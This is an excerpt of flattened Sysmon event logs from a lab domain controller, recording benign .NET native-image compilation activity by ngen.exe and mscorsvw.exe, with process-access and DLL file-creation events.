10341000x80000000000000005755Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:57.188{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9115-6005-7C01-00000000A301}4796C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005754Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:57.188{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9115-6005-7C01-00000000A301}4796C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+
84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005753Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:45:57.125{59A5CD1D-9114-6005-7B01-00000000A301}3108C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\c24-0\Microsoft.GroupPolicy.Targeting.dll2021-01-18 13:45:57.125 10341000x80000000000000005812Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:58.875{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9116-6005-8C01-00000000A301}1336C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005811Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:58.875{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9116-6005-8C01-00000000A301}1336C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005810Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:45:58.875{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9116-6005-8C01-00000000A301}1336C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005809Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:58.844{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9116-6005-8B01-00000000A301}808C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000005808Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:58.828{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9116-6005-8B01-00000000A301}808C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005807Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:58.828{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9116-6005-8B01-00000000A301}808C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84
d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005806Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:45:58.828{59A5CD1D-9116-6005-8A01-00000000A301}3048C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\be8-0\Microsoft.GroupPolicy.Commands.dll2021-01-18 13:45:58.828 10341000x80000000000000005805Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:58.625{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9116-6005-8A01-00000000A301}3048C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005804Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:58.625{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9116-6005-8A01-00000000A301}3048C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005803Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:45:58.625{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9116-6005-8A01-00000000A301}3048C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005802Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:45:58.609{59A5CD1D-9116-6005-8901-00000000A301}4264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\10a8-0\Microsoft.GroupPolicy.Commands.dll2021-01-18 13:45:58.609 10341000x80000000000000005801Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:45:58.422{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9116-6005-8901-00000000A301}4264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005800Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:58.406{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9116-6005-8901-00000000A301}4264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005799Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:45:58.406{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9116-6005-8901-00000000A301}4264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005798Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:58.359{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9116-6005-8801-00000000A301}2268C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000005797Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:58.344{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9116-6005-8801-00000000A301}2268C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005796Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:58.344{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9116-6005-8801-00000000A301}2268C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+
84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005795Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:45:58.328{59A5CD1D-9116-6005-8701-00000000A301}1512C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\5e8-0\Microsoft.GroupPolicy.Targeting.Interop.dll2021-01-18 13:45:58.328 10341000x80000000000000005794Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:58.234{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9116-6005-8701-00000000A301}1512C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005793Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:58.219{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9116-6005-8701-00000000A301}1512C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005792Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:45:58.219{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9116-6005-8701-00000000A301}1512C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005791Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:58.188{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9116-6005-8601-00000000A301}1128C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000005790Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:58.188{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9116-6005-8601-00000000A301}1128C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005789Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:58.188{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9116-6005-8601-00000000A301}1128C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+
84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005788Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:45:58.172{59A5CD1D-9116-6005-8501-00000000A301}2572C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\a0c-0\Microsoft.GroupPolicy.ServerAdminTools.Private.GpmgmtpLib.dll2021-01-18 13:45:58.172 10341000x80000000000000005787Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 